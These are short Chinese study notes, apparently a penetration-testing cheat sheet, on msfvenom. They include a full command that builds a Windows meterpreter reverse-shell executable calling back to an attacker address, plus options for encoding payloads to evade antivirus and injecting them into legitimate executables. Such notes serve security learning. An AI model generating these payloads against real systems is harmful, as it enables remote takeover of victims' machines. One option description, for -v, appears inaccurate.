msfvenom

是攻击载荷（payload）生成器

格式：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.32 LPORT=4456 -f exe -o payload1.exe

-p：指定需要使用的payload

-f：指定输出格式

-o：保存payload文件输出

——

-e：指定需要使用的encoder编码免杀

-a：指定payload的目标架构，比如：x86 | x64

-b：使用规避字符集

-n：为payload预先指定一个NOP滑动长度

-s：设定payload的最大长度（文件大小）

-i：指定编码次数

-c：指定一个附加的win32 shellcode文件

-x：指定一个自定义的可执行文件作为模板

-k：保护模板程序的动作，注入的payload作为一个新的进程运行

-v：指定输出格式

【补充】

lhost：local host（本地主机）【攻击机】

rhost：remote host（远程主机）【被攻击机】

payload：攻击代码

清屏快捷键：ctrl+l